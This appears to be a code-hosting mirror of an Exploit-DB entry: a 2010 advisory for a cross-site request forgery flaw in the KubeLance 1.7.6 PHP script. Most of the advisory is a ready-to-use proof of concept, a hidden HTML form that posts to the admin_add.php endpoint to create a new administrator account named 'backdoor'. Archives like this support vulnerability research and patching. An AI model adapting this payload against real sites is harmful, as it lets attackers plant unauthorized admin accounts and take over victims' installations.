bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11322.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
1.2 KiB
Text
Raw Blame History

[#-----------------------------------------------------------------------------------------------#]
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 02. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: KubeLance
[#] Version: 1.7.6
[#] Platform: PHP
[#] Link: http://www.kubelabs.com/kubelance/
[#] Price: 90 $
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)
[#-----------------------------------------------------------------------------------------------#]
KubeLance script lack of cross site request forgery protection, allowing us to make exploit and add new admin user.
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">
<input type="hidden" name="username" value="backdoor">
<input type="hidden" name="password" value="another-admin-added">
<input type="submit" name="submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[#]EOF
Reference in a new issue View git blame Copy permalink